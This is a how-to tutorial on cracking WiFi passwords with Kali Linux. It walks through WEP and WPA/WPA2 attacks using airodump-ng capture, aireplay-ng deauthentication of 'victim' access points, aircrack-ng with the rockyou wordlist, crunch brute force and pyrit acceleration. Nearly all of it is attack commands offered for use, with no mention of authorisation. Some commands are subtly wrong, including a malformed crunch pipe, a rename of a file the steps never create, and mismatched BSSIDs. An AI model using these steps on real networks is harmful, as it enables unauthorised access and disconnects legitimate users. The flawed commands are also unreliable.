How to hack wifi using kali linux 2.0

WiFi Hacking


Crack WEP protected wifi using terminal.


1.  Open terminal in kali linux.

2.  In Terminal Type: airmon-ng

           (Above command is used to Check weather your wireless card is available and working properly)

3.  Type: airmon-ng start wlan0

           (Put your wireless card into monitoring mode as wifi cracking is possible in monitoring mode only)

4.  Type command: airodump-ng mon0

            (Command to scan the wireless access point around you and get details about those access point.)

5.  Type command : airodump-ng –w <File name> –c <Target Channel no.> --bssid <BSSID of target > mon0

               (  eg: airodump-ng –w MTNL-01 –c 3 --bssid 11:22:33:44:55:66 mon0)

              (command start capturing the packet for cracking the wifi password.)

6.  Type command : aireplay-ng -0 0 -a 11:22:33:44:55:66  mon0

           (If there is only few packets  then you can deauth to generate more data packets with above command.It help to capture the packet more faster.)

7.  Type command: aircrack-ng MTNL-01.cap

            ( AirCrack is used to crack the WEP key )

 

Crack WEP Protected Wifi Using Gerix Tool.



1.Go to Applications > BackTrack > Exploitation Tools > Wireless Exploitation Tools > WLAN Exploitation > gerix-wifi-cracker-ng.

2.Open Configuration tab.

3.Select interface from the list and click Enable/Disable Monitor Mode button.This will put the wifi into monitor mode.

4.Scan networks to get a list of all available wireless networks.

5. Select a target wireless network

6. Open WEP tab.

7. Click "Start Sniffing and Logging".

8. Open WEP Attacks (no-client).

9. Click On button "Start false access point Authentication on victim".

10. After having collected a few packages (at least 10000packets) cancel and close opened terminal windows.

11. Open Cracking tab in Gerix.

12. Click On button, Aircrack-ng –Decrypt WEP password.


How To Crack WPA/WPA2 Protected Wi-Fi With Dictionary



1.  Open terminal in kali linux.

2.  Type command : airmon-ng

           (Check weather your wireless card is avilable and working properly)

3.  Type command : airmon-ng start wlan0

           (Command put your wireless card into monitoring mode as wifi cracking is possible in monitoring mode only)

4.  Type command: airodump-ng mon0

            (command to scan the wireless access point around you and get details about available wifi network.)

5.  Type command : airodump-ng –w <File name> –c <Target Channel no.> --bssid <BSSID of target > mon0

               (eg: airodump-ng –w MTNL –c 3 –bssid 11:22:33:44:55:66 mon0)

              (The Above command is used to capture the handshake)

6.  Type command: sudo aireplay-ng -0 0 –a 11:22:33:44:55:66 mon0

              (Send deauth attack on victim wifi access point this will disconnect the victim from the wifi)

7.  Type command: aircrack-ng -w wordlist.lst -b 00:11:22:33:44:55 MTNL.cap

            [ -w=The name of the dictionary file
             -b=The MAC address of the access point
              MTNL.cap=The name of the file that contains the authentication handshake ]

Above command will Crack the wifi using dictionery attack

[Note: Default directory for wordlist in linux:  /usr/share/wordlists/rockyou.txt.gz]

Steps to attach dictionery


1. cp /usr/share/wordlists/rockyou.txt.gz  

          (copy the file to root directory)

2. gunzIP rockyou.txt.gz    

          (UnzIP the file)

3. mv newrockyou.txt wordlist.lst    

           (rename the file from newrockyou to wordlist)


How to Crack WPA/WPA2 Protected Wi-Fi without dictionary



1.  Open terminal in kali linux.

2.  Type command : airmon-ng

           (Check weather your wireless card is avilable and working properly)

3.  Type command : airmon-ng start wlan0

           (Command put your wireless card into monitoring mode as wifi cracking is possible in monitoring mode only)

4.  Type command: airodump-ng mon0

            (command to scan the wireless access point around you and get details about available wifi network.)

5.  Type command : airodump-ng –w <File name> –c <Target Channel no.> --bssid <BSSID of target > mon0

               (eg: airodump-ng –w MTNL –c 3 –bssid 11:22:33:44:55:66 mon0)

              (The Above command is used to capture the handshake)

6.  Type command: sudo aireplay-ng -0 0 –a 11:22:33:44:55:66 mon0

              (Send deauth attack on victim wifi access point this will disconnect the victim from the wifi)

7.  Type command:crunch 8 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng  --bssid 11:22:33:44:55 :66  -w  MTNL.cap

              [a).crunch: crunch is used to crack wifi without dictionary as crunch automatically generate the wordlists. working of crunch is similar to brute force attack. It try all possible combination referred by user to crack password.

                b). 8 12=It indicates minimum length of password is 8 and maximum length of password is 12.it generate the wordlist starting  with 8 character and maximum with 12 character.

                c).wordlist contain all lowercase a-z, uppercase A-Z, Number 0-9 as user defined.

                d).--bssid : specifies the target MAC address

                e). MTNL.cap is the handshake file on which client perform attack.


How To Speed Up Wifi Cracking Process using pyrit


In the dictionary and crunch attack, PMKs speed is near 4000 which will take lots of time to crack wifi so use the below trick to increase the speed of attack. This will provide 60000-100000 PMKs depends on client hardware.

1.  Open terminal in kali linux.

2.  Type command : airmon-ng

           (Check weather your wireless card is avilable and working properly)

3.  Type command : airmon-ng start wlan0

           (Command put your wireless card into monitoring mode as wifi cracking is possible in monitoring mode only)

4.  Type command: airodump-ng mon0

            (command to scan the wireless access point around you and get details about available wifi network.)

5.  Type command : airodump-ng –w <File name> –c <Target Channel no.> --bssid <BSSID of target > mon0

               (eg: airodump-ng –w MTNL –c 3 –bssid 11:22:33:44:55:66 mon0)

              (The Above command is used to capture the handshake)


[Note: Default directory for wordlist in linux:  /usr/share/wordlists/rockyou.txt.gz]
  

Steps to attach dictionery


1. cp /usr/share/wordlists/rockyou.txt.gz  

          (copy the file to root directory)

2. gunzIP rockyou.txt.gz    

          (UnzIP the file)

3. mv newrockyou.txt wordlist.lst    

           (rename the file from newrockyou to wordlist)


 

Download and install pyrit


1.  svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn   

(Download the file)

2.  cd pyrit_svn/pyrit/ ./setup.py build install       

(build and install setup.py file)

3.  cd ..                          

(step back to pyrit_svn)

4.  Cd cpyrit_calpp    

(go to  cpyrit_calpp directory)

5.  Edit setup.py file find VERSION = '0.4.0-dev and change to VERSION = '0.4.1-dev 

also
                find CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include')) and replace with CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include/CAL'))
                        
After making above changes in setup.py file.Save the file and run using below command

6.  ./setup.py build install   

(build and install  and edited file)

7.  pyrit –e MTNL create_essid   

(Create essid in pyrit databases)

8.  pyrit -i  wordlist .lst import_passwords     

(import the dictionary in pyrit databases)

9.  pyrit batch           

( create table in pyrit databases

10.pyrit –r MTNL .cap attack_db       

(perform attack on handshake file)

This process will increase the wifi cracking and crack the wifi in very less time.